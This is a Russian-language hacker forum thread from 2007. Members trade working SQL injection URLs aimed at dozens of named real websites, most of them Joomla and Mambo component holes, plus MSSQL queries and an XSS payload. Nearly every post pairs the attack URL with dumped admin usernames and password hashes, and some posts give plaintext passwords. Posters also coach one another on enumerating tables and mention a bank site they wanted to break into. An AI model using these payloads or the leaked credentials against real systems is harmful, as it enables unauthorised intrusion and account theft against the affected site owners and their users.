http://3d-sex-villa.info/?view=-1+union+select+version()/*
дак вот ) там нет вывода на странице )
http://3d-sex-villa.info/?image=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version() ,0x71),0x71)/*
четвертый мускул....кому не лень - подбирайте таблицы...
+ еще:
/home/sparkxxx/domains/3d-sex-villa.info/public_html/
groundhog
23.08.2007, 13:22
www.akabel.ru:
http://www.akabel.ru/catalog.php?c=1&e=-11+UNION+SELECT+1,2,3,TABLE_NAME,5,6+FROM+INFORMAT ION_SCHEMA.TABLES/*
http://www.akabel.ru/catalog.php?c=1&e=-11+UNION+SELECT+1,2,3,COLUMN_NAME,5,6+FROM+INFORMA TION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=CHAR(0x72,0x7 7,0x64,0x5F,0x75,0x73,0x65,0x72,0x73)/*
groundhog
23.08.2007, 13:50
www.shopping-spb.ru (вывод в тайтл):
http://www.shopping-spb.ru/index.php?page_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,CONCAT(VERSION(),0x3a,USER(),0x3a,DATABASE( )),19/*
Dr.Frank
23.08.2007, 15:21
2t00th:
http://www.amusic.hk/index.php?i=news&id=1%27+union+select+1,2,3,4,concat(id,0x3a,passwo rd),version(),7,8+from+a_users/*
http://www.gamesector.org/review.php?id=-225+union+select+1,2,concat_ws(0x3a,id,name,email, ip_address),4,5,6,7+from+ibf_members/*
groundhog
23.08.2007, 17:59
MS SERVER.
http://www.tours.ru/shop/default.asp?top_id=1+OR+1=@@version+--+
http://www.tours.ru/shop/default.asp?top_id=1+OR+1=(SELECT+DB_NAME())+--+
http://www.tours.ru/shop/default.asp?top_id=1+OR+1=(SELECT+SYSTEM_USER)+--+
http://www.tours.ru/shop/default.asp?top_id=1+OR+1=(SELECT+TOP+1+TABLE_NAME +FROM+INFORMATION_SCHEMA.TABLES)+--+
походу тут интересно,жаль я не очень пока разбираюсь что с этим дальше делать :(
код:
http;//www.webmarket.mobi/ wm.php?id=-3+unio n+select+1 ,column_ name ,3 ,4 ,5 , 6+from+informatio n_schema.col umns/*
код:
http://www.ezgulik.org/news.php?id=-197+union+select+1,2,3,user(),5,6/*
мускул 4 версии
Nazaret2005
23.08.2007, 20:09
походу тут интересно,жаль я не очень пока разбираюсь что с этим дальше делать :(
код:
http;//www.webmarket.mobi/ wm.php?id=-3+unio n+select+1 ,column_ name ,3 ,4 ,5 , 6+from+informatio n_schema.col umns/*
Делай вот так
http://www.webmarket.mobi/wm.php?id=-3+union+select+1,column_name,TABLE_NAME,4,5,6+from +information_schema.columns/*
тут тебе показано,какие таблицы и где находятся...
Странно Can't select from table:
http://www.webmarket.mobi/wm.php?id=-3+union+select+1,admin_login,admin_password,4,5,6+ from+admin_settings/*
вот что то есть
http://www.webmarket.mobi/wm.php?id=-3+union+select+1,logn,pasw,4,u_id,6+from+users3/*
Делай вот так
тут тебе показано,какие таблицы и где находятся...
Странно Can't select from table:
Ты бы лучше не советы давал, а мануалы почитал бы:
http://www.webmarket.mobi/wm.php?id=-3+union+select+1,aes_decrypt(aes_encrypt(concat(ad min_login,char(58),admin_password),0x71),0x71),3,4 ,5,6+from+admin_settings/*
Ded MustD!e
23.08.2007, 21:21
http://www.intergy.ca/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(11 7,115,101,114,110,97,109,101,58),userna
me,char(32,112,97,115,115,119,111,114,100,58),pass word),3,4,5,6,7,8,111,222,333,444,0,0,0
,555,666,777,888,1,2,3,4,5,0%20from%20jos_users/*&Itemid=86
admin:c74c6ca9af4e07d395d15bdd461c1985
http://www.administrationnetwork.ca/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(11 7,115,101,114,110,97,109,
101,58),username,char(32,112,97,115,115,119,111,11 4,100,58),password),3,4,5,6,7,8,111,222,
333,444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%2 0jos_users/*&Itemid=36
admin:53f580fcae1d2f3ffa1cbbb4493b5142
http://www.recruitingsales.com/index.php?option=com_neorecruit&task=offer_vie
w&id=99999999999%20union%20select%201,concat(char(11 7,115,101,114,110,97,109,101,5
8),username,char(32,112,97,115,115,119,111,114,100 ,58),password),3,4,5,6,7,8,111,222,333,
444,0,0,0,555,666,777,888,1,2,3,4,5,0%20from%20jos _users/*&Itemid=26
admin:93e3b04e8c37f439047122606d4b8e56
http://www.femstudent.nl/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(11 7,115,101,114,110,97,109,101,58),username,char(32, 112,97,115,115,119,111,114,100,58),password),3,4,5 ,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3 ,4,5,0%20from%20jos_users/*&Itemid=33
admin:14aeedbb91b2674adfae0c33edb93f3b
http://www.rh-communication.ch/cms/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(11 7,115,101,114,110,97,109,101,58),username,char(32, 112,97,115,115,119,111,114,100,58),password),3,4,5 ,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3 ,4,5,0%20from%20jos_users/*&Itemid=27
rhcomm:dde29cf6540fb2d19735874bbe1b075d:nZU2ch2im8 VZIWVd
http://www.coordination-nationale-infirmiere.org/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(11 7,115,101,114,110,97,109,101,58),username,char(32, 112,97,115,115,119,111,114,100,58),password),3,4,5 ,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3 ,4,5,0%20from%20jos_users/*&Itemid=98
adminsjuilla:6e2f7fa24b775562fc88d8f9a5d76573
http://www.nounouchelanou.com/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(11 7,115,101,114,110,97,109,101,58),username,char(32, 112,97,115,115,119,111,114,100,58),password),3,4,5 ,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3 ,4,5,0%20from%20jos_users/*&Itemid=18
admin:6d9556fe5e923f525bd376b5269318b4
http://www.dentalservicesagency.ie/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(11 7,115,101,114,110,97,109,101,58),username,char(32, 112,97,115,115,119,111,114,100,58),password),3,4,5 ,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3 ,4,5,0%20from%20jos_users/*&Itemid=26
admin:b664b357e56de3ceb408cec88e646247
http://www.utahstateonline.com/index.php?option=com_neorecruit&task=offer_view&id=99999999999%20union%20select%201,concat(char(11 7,115,101,114,110,97,109,101,58),username,char(32, 112,97,115,115,119,111,114,100,58),password),3,4,5 ,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3 ,4,5,0%20from%20jos_users/*&Itemid=29
hankhill:1e8e222a26a62564a467499b0e12e94e
Ded MustD!e
23.08.2007, 21:41
http://www.symbianone.com/index.php?option=com_remository&Itemid=75&func=selectcat&cat=64549999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),0,0,0%2 0from%20mos_users/*
http://www.lbszone.com/index.php?option=com_remository&Itemid=28&func=selectcat&cat=64549999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),0,0,0%2 0from%20mos_users/*
http://www.plogue.com/index.php?option=com_remository&Itemid=31&func=selectcat&cat=64549999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),0,0,0%2 0from%20mos_users/*
http://www.gisuser.com/index.php?option=com_remository&Itemid=105&func=selectcat&cat=64549999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),0,0,0%2 0from%20mos_users/*
http://www.chernozemie-inteko.ru/index.php?option=com_remository&func=selectcat&cat=64549999%20union%20select%201,concat(char(117, 115,101,114,110,97,109,101,58),username,char(32,11 2,97,115,115,119,111,114,100,58),password),0,0,0%2 0from%20mos_users/*&Itemid=77
http://www.mrtt.pmis.gov.mn/index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*&Itemid=45
http://farmmonitordb.net/cms/index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*&Itemid=26
http://www.vanbuurenestates.co.za/index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*&Itemid=89
http://www.savingbaily.com/index.php?option=com_nicetalk&tagid=-2)%20union%20select%201,2,3,4,5,6,7,8,0,999,concat (char(117,115,101,114,110,97,109,101,58),username, char(32,112,97,115,115,119,111,114,100,58),passwor d),777,666,555,444,333,222,111%20from%20jos_users/*&Itemid=34
_-Ramos-_
23.08.2007, 21:41
http://www.thehopeless.net/moblog/big.php?img=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*&pg=1
Дальше сами копайте ))
[53x]Shadow
23.08.2007, 21:43
Ты бы лучше не советы давал, а мануалы почитал бы:
http://www.webmarket.mobi/wm.php?id=-3+union+select+1,aes_decrypt(aes_encrypt(concat(ad min_login,char(58),admin_password),0x71),0x71),3,4 ,5,6+from+admin_settings/*
а можно еще и так
http://www.webmarket.mobi/wm.php?id=-3+union+select+1,convert(concat(admin_login,char(5 8),admin_password),binary),3,4,5,6+from+admin_sett ings/*
Ded MustD!e
23.08.2007, 21:53
http://www.vortex-club.com/cms/index.php?option=com_eventlist&Itemid=99999999&func=details&did=9999999999999%20union%20select%200,0,concat(ch ar(117,115,101,114,110,97,109,101,58),username,cha r(32,112,97,115,115,119,111,114,100,58),password), 4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0 %20from%20jos_users/*
admin:2c019e4d345e0e2693af848183c8654a
http://www.rabota.su/info/makebiz/index.php?id=-1+union+select+user(),2/*
http://www.clubtour.su/tourinfo.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Серенький
23.08.2007, 22:18
http://www.rabota.su/info/makebiz/index.php?id=-1+union+select+user(),2/*
вот нормальный выводhttp://www.rabota.su/employer/search_results.php?direct=-2065+union+select+concat_ws(0x3a,user_id,username, user_password,user_level)+from+phpbb_users+where+u ser_level=1+limit+0,1/*
Termin@L
23.08.2007, 23:43
http://www.st-johns-school.org.uk/index.php?inc=999+union+select+1,2,3,database(),5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
Что-то старею что-ли, но таблицу подобрать не могу... НЕЛР
Кстати такая бага встречается во многих сайтах, типа из бд выбирается имя файла, и инъекция)))
Ded MustD!e
24.08.2007, 01:11
http://www.lrvk.gov.lv/page.php?id=-1+union+select+1,2,3,4,username,6,7,password,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 +from+users/*
admin:6cb062ad1d75b703
Nazaret2005
24.08.2007, 01:16
http://ipen.org.in/index.php?option=com_remository&func=selectcat&cat=2529%20union%20select%201,concat(char(117,115, 101,114,110,97,109,101,58),username,char(32,112,97 ,115,115,119,111,114,100,58),password),0,0,0+from+ mos_users/*
username: admin
password - md5: aa874813a18b5048770d683a51b8b342
username: sachin
password - md5: aa874813a18b5048770d683a51b8b342
http://www.lov-wow.com/index.php?option=com_remository&func=selectcat&cat=2529%20union%20select%201,concat(char(117,115, 101,114,110,97,109,101,58),username,char(32,112,97 ,115,115,119,111,114,100,58),password),0,0,0+from+ mos_users/*
username: admin
password - md5: 65f03ae284e333b7d4097d532fdf4045
username: fableman
password - md5: 50432ac5a54b03b3a5c24b2d0de82f84
http://www.p-edge.nl/index.php?option=com_remository&func=selectcat&cat=2529%20union%20select%201,concat(char(117,115, 101,114,110,97,109,101,58),username,char(32,112,97 ,115,115,119,111,114,100,58),password),0,0,0+from+ mos_users/*
username: ADMIN
password - md5: 3820544b8ed2b76f81ba8a234f7c0a6d
http://www.harmarsuperstar.com/index.php?option=com_remository&func=selectcat&cat=2529%20union%20select%201,concat(char(117,115, 101,114,110,97,109,101,58),username,char(32,112,97 ,115,115,119,111,114,100,58),password),0,0,0+from+ mos_users/*
Слишком много юзеров ...
http://corp.nunan.com/index.php?option=com_remository&func=selectcat&cat=2529%20union%20select%201,concat(char(117,115, 101,114,110,97,109,101,58),username,char(32,112,97 ,115,115,119,111,114,100,58),password),0,0,0+from+ mos_users/*
http://www.setrpc.org/index.php?option=com_remository&func=selectcat&cat=2529%20union%20select%201,concat(char(117,115, %20101,114,110,97,109,101,58),username,char(32,112 ,97%20,115,115,119,111,114,100,58),password),0,0,0 +from+%20mos_users/*
username: setrpc
password: planning
http://www.firstpresbyterian.org/index.php?option=com_remository&func=selectcat&cat=2529%20union%20select%201,concat(char(117,115, %20101,114,110,97,109,101,58),username,char(32,112 ,97%20,115,115,119,111,114,100,58),password),0,0,0 +from+%20mos_users/*
username: volunteer1
password: iamone
http://www.contractors.net/index.php?option=com_remository&func=selectcat&cat=2529%20union%20select%201,concat(char(117,115, %20101,114,110,97,109,101,58),username,char(32,112 ,97%20,115,115,119,111,114,100,58),password),0,0,0 +from+%20mos_users/*
username: gail
password: miser
Слишком много юзеров ...
[53x]Shadow
24.08.2007, 01:29
www.hec.edu
http://www.hec.edu/hec/eng/professeurs_recherche/p_liste/p_bio.php?num=-92+union+select+1,2,3,4,convert(concat(version(),0 x3a,user(),0x3a,database()),binary),6,7/*
version: 4.1.11-Debian_4-log
user: hec_profs@localhost
db: hec_profs_recherche
www.law.gmu.edu
http://www.law.gmu.edu/academics/course_detail.php?num=-177+union+select+1,2,concat(version(),0x3a,user(), 0x3a,database()),4,5,6,7,8,9,10/*
version: 4.0.13-log
user: lawSelect@localhost
db: Courses
Nazaret2005
24.08.2007, 02:02
http://chany.1nsk.ru/component/index.php?option=com_eventlist&func=details&did=9999999999999%20union%20select%200,0,concat(
char(117,115,101,114,110,97,109,101,58),username,c har(32,112,
97,115,115,119,111,114,100,58),password),4,5,6,7,8 ,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20from%2 0jos_users/*
username: admin
password - md5: 482d8830c76ce67c975ab46ff3ba5d06
http://www.wickedminds.net/index.php?option=com_eventlist&func=details&did=9999999999999%20union%20select%200,0,concat(ch ar
(117,115,101,114,110,97,109,101,58),username,char( 32,112,97,115,115,119,111,114,100,58),password),4, 5,6,7,8,9,00,0,444,555,0,777,0,999,
0,0,0,0,0,0,0%20from%20jos_users/*
username: admin
password - md5: 529b0ab29f005d89132fa6ce4df3b0dd
http://www.blueprinteducation.org/west/index.php?option=com_eventlist&func=details&did=9999999999999%20union%20select%200,
0,concat(char(117,115,101,114,110,97,109,101,58),u sername,char(32,112,97,115,115,119,111,114,100,58) ,password),4,5,6,7,8,9,00,0,444,555,
0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*
username: admin
password - md5: ca7962a267407927e34b1aeed06a3cb0
http://www.this-is-a-remix.com/Joomla/index.php?option=com_eventlist&func=details&did=9999999999999%20union%20select%200,0,
concat(char(117,115,101,114,110,97,109,101,58),use rname,char(32,112,97,115,115,119,111,114,100,58),p assword),4,5,6,7,8,9,00,0,444,555,
0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*
username: jtwist
password - md5: 14969f34049e464f88d02bd075cdcf2c
http://www.jesushouse.at/joomla/index.php?option=com_eventlist&func=details&did=9999999999999%20union%20select%200,0,conc
at(char(117,115,101,114,110,97,109,101,58),usernam e,char(32,112,97,115,115,119,111,114,100,58),passw ord),4,5,6,7,8,9,00,0,444,555,0,777,
0,999,0,0,0,0,0,0,0%20from%20jos_users/*
username: admin
password - md5: 0c493157cc274bb698dada25a92b06a6
http://www.ostprignitz-jugend.de/gewoelbe/component/index.php?option=com_eventlist&func=details&did=9999999999999%20union
%20select%200,0,concat(char(117,115,101,114,110,97 ,109,101,58),username,char(32,112,97,115,115,119,1 11,114,100,58),password),4,5,6,
7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0%20fro m%20jos_users/*
username: admin
password - md5: bdcb268b0facd7d6b24c0d39091be524
http://sjonniewiener.biz/cms/index.php?option=com_eventlist&func=details&did=9999999999999%20union%20select%200,0,concat(
char(117,115,101,114,110,97,109,101,58),username,c har(32,112,97,115,115,119,111,114,100,58),password ),4,5,6,7,8,9,00,0,444,555,0,777,
0,999,0,0,0,0,0,0,0%20from%20jos_users/*
username: admin
password - md5: 8ce83701c7e38f2e96f7f6bb2825b0b4
http://www.kabardin.sk/index.php?option=com_eventlist&func=details&did=9999999999999%20union%20select%200,0,concat(ch ar(
117,115,101,114,110,97,109,101,58),username,char(3 2,112,97,115,115,119,111,114,100,58),password),4,5 ,6,7,8,9,00,0,444,555,0,777,0,999
,0,0,0,0,0,0,0%20from%20jos_users/*
username: admin
password - md5: ded7d59e7ae3d9d77a6726f1f5dc8771
http://www.euro-kink.com/cms/index.php?option=com_eventlist&func=details&did=9999999999999%20union%20select%200,0,
concat(char(117,115,101,114,110,97,109,101,58),use rname,char(32,112,97,115,115,119,111,114,100,58),p assword),4,5,6,7,8,9,00,0,444
,555,0,777,0,999,0,0,0,0,0,0,0%20from%20jos_users/*
username: admin
password - md5: 69c3dab74972313bb8ad3ec437014aa0
Ded MustD!e
24.08.2007, 03:05
http://property.offshore-manual.ru/index.php?option=com_gmaps&task=viewmap&Itemid=86&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:aaa86f62472c97f82be7a20373c5faf5
http://www.popiteru.ru/index.php?option=com_gmaps&task=viewmap&Itemid=8&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
fredi:cdfba41d8d0f3f466bcdac7562153620
http://golf.gr/index.php?option=com_gmaps&task=viewmap&Itemid=1&mapId=-1/**/union/**/select/**/0,password,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:7946848d74345f8b1601419267bc46a0:sgGX9fKiTQK Uc24D
http://www.ttclubs.com/index.php?option=com_gmaps&task=viewmap&Itemid=3&mapId=-1/**/union/**/select/**/0,password,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:50deaf76906c4b018bb8671621976014
http://turnersimscouk.pre-dns-change.com/index.php?option=com_gmaps&task=viewmap&Itemid=54&mapId=-1/**/union/**/select/**/0,1,username,3,4,5,6,7,8/**/from/**/jos_users/*
admin:b6ba6f629e24ada12521da3313385d21
http://www.srkengineering.com.au/index.php?option=com_gmaps&task=viewmap&Itemid=21&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:4a50a931db0de18a8e299cea8c462277
http://www.dpsnc.net/Guatemala/index.php?option=com_gmaps&task=viewmap&Itemid=27&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:11c1066dde013e2cd20932d053ef895c
http://www.melplashshow.co.uk/?option=com_gmaps&task=viewmap&Itemid=38&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:f5091ef24d4d9f56b36750957b6fa616
http://www.aysoareag.org/index.php?option=com_gmaps&task=viewmap&Itemid=69&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:fcf337650b59ce188612847cbc0f885c:AwyDiAKPawh AsgF8
http://www.shipcreeksalmonderby.com/index.php?option=com_gmaps&task=viewmap&Itemid=28&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
cadguy:bde1cf25419a99580b47bb0f23268d25
http://tucepi-apartments.com/index.php?option=com_gmaps&task=viewmap&Itemid=42&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:48a53d5b1db6d3d13f6749e05cba00ae
http://www.exmouthonline.com/index.php?option=com_gmaps&task=viewmap&Itemid=67&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:f75fa350c0b642b05ce2b22223760c71
http://lcsa.info/index.php?option=com_gmaps&task=viewmap&Itemid=49&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
TenX:8f6add1ee934dacc262e369a8403d08e
http://www.mightycity.co.uk/index.php?option=com_gmaps&task=viewmap&Itemid=5&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:b6450e32a9efc7f172d49a57fd570fbd
http://www.jemburtigny.ch/index.php?option=com_gmaps&task=viewmap&Itemid=99&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:1a1dc91c907325c69271ddf0c944bc72
http://www.global-resources.co.uk/content/index.php?option=com_gmaps&task=viewmap&Itemid=46&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
1a1n5adm1nAcc0unt:63c59ca1a431d10c2f3687216350d6a7
http://www.sportzone.org.nz/index.php?option=com_gmaps&task=viewmap&Itemid=374&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:7235d5430129327c4bb96062bb5ce6bd
http://www.cateandsally.com/index.php?option=com_gmaps&task=viewmap&Itemid=35&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:b266d4f01cb077a11dd62e46302d27de
http://www.yumyummap.com/san_francisco/index.php?option=com_gmaps&task=viewmap&Itemid=17&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
colin.pantin:bc6f70c347db763a83b4b4be0ac1f222:epi5 1i3ITlVLHFwk
http://www.bwtc.com/index.php?option=com_gmaps&task=viewmap&Itemid=27&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:694f33456eab7e8665bca258a6aca942
http://www.digestcommunity.net/index.php?option=com_gmaps&task=viewmap&Itemid=76&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
digestedadmin:fc2d1e75174ff5d93d8aa7dba4b53590
http://stjamesepiscopal.info/index.php?option=com_gmaps&task=viewmap&Itemid=42&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
hbaker:23245cbfa834b21e1208b7b7c0cbb130
http://lisbon.directrouter.com/~crystalf/index.php?option=com_gmaps&task=viewmap&Itemid=36&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
Shaun Anderson:6e9c4948c7f04aeb5556575fd2d56487
http://www.ifactory.com.au/index.php?option=com_gmaps&task=viewmap&Itemid=93&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:863c0c12916237790b8b9f5b719bad2b
http://sierraapplefestival.com/index.php?option=com_gmaps&task=viewmap&Itemid=27&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:9b2e1b7883b38f7b6ed478ebc26b3655
http://www.islengineering.com/index.php?option=com_gmaps&task=viewmap&Itemid=104&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
islengin:033f123b9e92e3d5dcef9b84bebd2189
http://www.texanstalk.com/index.php?option=com_gmaps&task=viewmap&Itemid=3&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:a9ff7154aea384f303e20aef3a1c187e
http://avonpd.com/index.php?option=com_gmaps&task=viewmap&Itemid=35&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
avonpdco:d46cb1ca6bd45a378db30d1a680e27bb
http://www.intemo.com/index.php?option=com_gmaps&task=viewmap&Itemid=32&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:48c50c33e87aaec5dee39606f60bf8da:pyvCnXD0hUz EUXNR
http://northwalesclimbers.co.uk/index.php?option=com_gmaps&task=viewmap&Itemid=80&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
admin:9224860eb0eeea71e76f7471d11d2aed
http://www.kitemed.com/2/index.php?option=com_gmaps&task=viewmap&Itemid=82&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*&Itemid=81
admin:4b16650d001fd94c0e8e9162bca51447
http://www.worleylaw.com/index.php?option=com_gmaps&task=viewmap&Itemid=118&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
Nickolai:f43332752bcd5e7e72d799fa176e065b
Информация о колонках и таблицах не выводится,или я ошибаюсь?
Код:
http://www.flirtanica.ru/articles1.php?id=-89+UNION+SELECT+1,CONCAT(VERSION(),0x3a,USER(),0x3 a,DATABASE()),3,4,5/*
выдает ошибку: error:1044 Access denied for user 'flirtani'@'%' to database 'INFORMATION_SCHEMA'
Информация о колонках и таблицах не выводится,или я ошибаюсь?
Код:
http://www.flirtanica.ru/articles1.php?id=-89+UNION+SELECT+1,CONCAT(VERSION(),0x3a,USER(),0x3 a,DATABASE()),3,4,5/*
выдает ошибку: error:1044 Access denied for user 'flirtani'@'%' to database 'INFORMATION_SCHEMA'
1) Юзай антибоян: http://antiboyansql.narod.ru/sql.txt
2) Версия мускула здесь 4, а значит что тут нету таблиц information_schema.tables и information_schema_columns
Очень тебе советую почитать побольше статей и мануалов.
3) На будующее эта тема не для вопросов, флейм, не раскрученные скули и т.д. будут удаляться.
http://www.bluebit.com.au/cms.php?id=-6+union+select+1,VERSION(),3/*
http://znakomstva.nu/metro.php?st=-1+union+select+1,concat(login,0x26,password),3+fro m+members/*
admin - 13061973
все пароли в открытом виде :)
да еще и мускул 5)
вам какой секс? классика? мадомаза? )) - на сайт зайдете - поймете меня )
http://www.zdv.ru/include/gallery.php?item=-1+union+select+1,2,3,4,5,6,7,name,9,10,11,12,13,14 ,15,16,17,18,version(),password,21+from+users+limi t+4,2/*
журнал какойто - типа эротический...непомню)
мускул 4 - и пара траблов
Таблицу юзерс нашел - в ней есть колумн пассворд а какой колумн логин держит не нашел))
+ ни один хеш расколоть не смог...
http://www.softp.ru/?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+members/*
Несмог подобрать...
ыгы ыгы...Тыбы статьи почитал а?
http://www.softp.ru/?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12, 13,14,15,16,17/*
Во первых - с чего ты взял что полей 10 во вторых с чего ты взял что там есть таблица мемберс?Или тебя плющит потому что ночь?Ты может выпил?
СТАТЬИ ЧИТАААААТЬ :) (юзай поиск и найдешь их на а-чате)
там еще бд мускул 4 - так что геморой с таблицами оставил тебе....
Nazaret2005
25.08.2007, 01:58
http://www.shidur.us/index.php?c=-41+union+select+1000,2000,3000,4000,5000,6000,7000 ,8000,9000,10000/*
4 версия :(
Ded MustD!e
25.08.2007, 14:15
http://www.yuta.co.yu/en/yuta/member.asp?id=1+or+1=(SELECT+TOP+1+USERNAME+from+A dmin)--
http://www.yuta.co.yu/en/yuta/member.asp?id=1+or+1=(SELECT+TOP+1+PASSWD+from+Adm in)--
Данные админа:
Login: admin
Password: P@ssw0rd
Админка находится по адресу http://www.yuta.co.yu/admin/
Red_Red1
25.08.2007, 17:30
http://www.shidur.us/index.php?c=-41+union+select+1000,2000,3000,4000,5000,6000,7000 ,8000,9000,10000/*
4 версия :(
:) Четвертая версия не мешает провести ПХП иньекцию, так что пост надо в ПХП. :)
http://www.shidur.us/index.php?page=[шелл] - удаленные инклуд :)
0nep@t0p
26.08.2007, 11:08
Банк "Левобережный"
_http://www.nskbl.ru/news/?id=-296+u nion +select+1,2,3,4,5/*
Давно мечтал похекать какой-нибудь банковский ресурс, но прав для чтения из users не хватает, не знаю что еще можно сделать :(
Версия 4.0.18
geezer.code
26.08.2007, 19:00
бригада ;) строительная )))
http://brigada.uz/plugins/ansmt/ansmt_view.php?id=-44+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_na me,user_loginname,user_password,user_email),8,9,10 ,11,12,13,14+from+brigada_user
стоит двиг е107.
Урал Инфо Проект
http://www.uip.ru/index.php?id=-3'+UNION+SELECT+1,%3Cscript%3Ealert('H00k%20%E1%FB %EB%20%E7%E4%E5%F1%FC!')%3C/script%3E,3,4,5,6,7,8+FROM+news+--+
halkfild
27.08.2007, 00:29
в антибояне проверял вроде нет
http://english.fortline.ru/page.php?TPLID=10&ID=-12'+union+select+concat_ws(0x3a,version(),user(),d atabase()),2+/*
5.0.22:fortline@localhost:fortline
http://english.fortline.ru/page.php?TPLID=10&ID=-12'+union+select+concat_ws(0x3a,login,password),2+ from+users/*
admin:Y2g3Yjhh
http://www.muz.md/studio.php?stdid=-11+union+select+1,concat_ws(0x3a,user(),version(), database())/*
adm_music@localhost:4.0.27-log:music
http://rustelcard.ru/index.php?option=com_rwcards&task=listCards&category_id=-1'union%20select%201,2,03,4,concat(char(117,115,10 1,114,110,97,109,101,58),username,char(112,97,115, 115,119,111,114,100,58),password),50,044,076,0678, 07%20from%20jos_users/*
username:admin
password:06c09e25d642a677aa787b2cdee94350
Недвижимость
